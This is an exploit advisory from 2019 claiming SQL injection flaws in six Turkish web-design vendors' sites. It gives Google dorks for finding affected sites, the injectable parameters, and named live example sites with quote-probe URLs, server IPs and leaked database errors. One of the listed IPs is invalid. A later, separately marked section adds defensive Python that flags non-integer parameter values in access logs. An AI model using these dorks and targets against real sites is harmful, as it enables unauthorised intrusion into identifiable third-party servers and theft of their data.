- ####################################################################
- # Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 25/01/2019
- # Vendor Homepages of 6 Products :
- 1) devsoft.com.tr
- 2) btmbilisim.com ~ btmarge.com
- 3) algoritma.com.tr
- 4) mplusnet.com
- 5) webicerik.com
- 6) verisay.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # CXSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010237
- ####################################################################
- # Products from 6 vendors suffer from remote SQL Injection vulnerabilities.
- ***************************************************************************
- 1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr
- 2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com
- 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr
- 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com
- 5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com
- 6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com
- ####################################################################
- # Google Dorks for Vulnerable Different Products ;
- ********************************************
- 1) intext:''Web Yazılım: Devsoft''
- 2) intext:''Tüm hakları saklıdır. BTM ARGE.''
- 3) intext:''www.algoritma.com.tr"
- 4) intext:''Powered By M.Ceylan'' site:tr
- 5) intext:Webİcerik Kurumsal
- 6) intext:Verisay Web Tasarım
- ####################################################################
- 1) Web Yazılım Devsoft SQL Injection Vulnerability
- ********************************************
- # Google Dork :
- ****************
- intext:''Web Yazılım: Devsoft''
- # SQL Injection Exploit :
- **********************
- /urunler.php?id=[SQL Injection]
- /page.php?id=[SQL Injection]
- /haber.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] adabroker.com.tr/urunler.php?id=90%27
- Note : (94.73.151.155) => There are 338 domains hosted on this server.
- Note : (159.69.91.216) => There are 44 domains hosted on this server.
- # SQL Database Error :
- *********************
- HATA : You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
- ####################################################################
- 2) BTMArgeBilişim SQL Injection Vulnerability
- ****************************************
- # Google Dork :
- ****************
- intext:''Tüm hakları saklıdır. BTM ARGE.''
- # SQL Injection Exploit :
- **********************
- /urun_detay.php?ID=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] habibmetal.com/urun_detay.php?ID=1'
- Note : (213.128.66.82) => There are 543 domains hosted on this server.
- Note : (35.243.133.12) => There are 2 domains hosted on this server.
- # SQL Database Error :
- **********************
- Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12
- ####################################################################
- 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
- **********************************************************
- # Google Dork :
- ****************
- intext:''www.algoritma.com.tr"
- # SQL Injection Exploit :
- **********************
- /urun.php?id=[SQL Injection]
- /urunler.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] ozgordal.com.tr/urun.php?id=15%27
- Note : (94.73.146.96) => There are 220 domains hosted on this server.
- Note : (93.187.206.206) => There are 693 domains hosted on this server.
- # SQL Database Error :
- **********************
- select * from yenilikler where id=15'
- select * from kategoriler where id=6'
- ####################################################################
- 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
- **************************************************
- # Google Dork :
- ****************
- intext:''Powered By M.Ceylan'' site:tr
- # SQL Injection Exploit :
- **********************
- /match.php?id_match=[SQL Injection]
- /lig/consult/istatistik.php?equipe=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] alanyaspor.org.tr/match.php?id_match=871%27
- Note : (31.169.73.251) => There are 1 domains hosted on this server.
- Note : (31.169.73.242) => There are 58 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_array() expects parameter 1 to be
- resource, boolean given in /home/alanyaspor/public_html/match.php on line 62
- ####################################################################
- 5) Webİcerik SQL Injection Vulnerability
- ************************************
- # Google Dork :
- ****************
- intext:Webİcerik Kurumsal
- # SQL Injection Exploit :
- **********************
- /index.php?page=mod_video_goster&videoID=[SQL Injection]
- /ENG/index.php?page=icerikgoster&menuID=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27
- Note : (77.92.99.319) => 1 Domain.
- Note : (77.92.99.31) => There are 13 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_assoc(): supplied argument is not a valid
- MySQL result resource in /var/www/vhosts/tcma.org.tr
- /tcma.org.tr/ENG/lib/emit_icerik.php on line 323
- ####################################################################
- 6) Verisay Web Tasarım SQL Injection Vulnerability
- *********************************************
- # Google Dork :
- ****************
- intext:Verisay Web Tasarım
- # SQL Injection Exploit :
- **********************
- /urunler/urun_detay.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] irena.com.tr/urunler/urun_detay.php?id=1465%27
- Note : (89.19.29.4) => There are 130 domains hosted on this server.
- Note : (52.19.74.107) => There are 10 domains hosted on this server.
- # SQL Database Error :
- **********************
- SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'
- Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
- given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15
- SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
- sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
- sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
- GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
- d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
- u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
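An added detection example, not part of the original advisory: every injection point listed above is an identifier parameter in a GET query string, so a web-server access log can be scanned for non-integer values in exactly those parameters. The log lines are constructed; the combined log format, the hypothetical page value `iletisim`, and the assumption that every listed parameter takes an integer (as in the advisory's sample requests) are not from the original.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint suffix -> identifier parameter, taken from the advisory's six sections.
WATCHED = {
    "/urunler.php": "id", "/page.php": "id", "/haber.php": "id",
    "/urun_detay.php": "ID", "/urun.php": "id", "/match.php": "id_match",
    "/lig/consult/istatistik.php": "equipe", "/urunler/urun_detay.php": "id",
}
# index.php dispatches on ?page=, so the parameter to watch depends on that value.
INDEX_PAGES = {"mod_video_goster": "videoID", "icerikgoster": "menuID"}
# Assumption: combined log format; only the client and request target are used.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*"')
INTEGER = re.compile(r"[0-9]{1,10}")  # assumption: ids are short ASCII integers

def watched_params(path, query):
    """Names of the parameters that should hold an integer for this request."""
    names = {p for suffix, p in WATCHED.items() if path.endswith(suffix)}
    if path.endswith("/index.php"):
        names.update(INDEX_PAGES[p] for p in query.get("page", []) if p in INDEX_PAGES)
    return names

def flag_requests(lines):
    """Return (client, path, parameter, decoded value) for each non-integer value."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)  # also decodes %27
        for name in sorted(watched_params(url.path, query)):
            for value in query.get(name, []):
                if not INTEGER.fullmatch(value):
                    hits.append((client, url.path, name, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2019:10:00:01 +0300] "GET /urunler.php?id=90 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Jan/2019:10:00:05 +0300] "GET /urunler.php?id=90%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [25/Jan/2019:10:00:09 +0300] "GET /index.php?page=mod_video_goster&videoID=12%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [25/Jan/2019:10:00:12 +0300] "GET /index.php?page=iletisim&videoID=abc HTTP/1.1" 200 2048',
    '198.51.100.7 - - [25/Jan/2019:10:00:15 +0300] "GET /urunler/urun_detay.php?id=1465%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

A hit only shows that a non-integer value reached the parameter; whether the application was affected depends on how it builds the query, which is fixed by binding the value as a parameter instead of concatenating it.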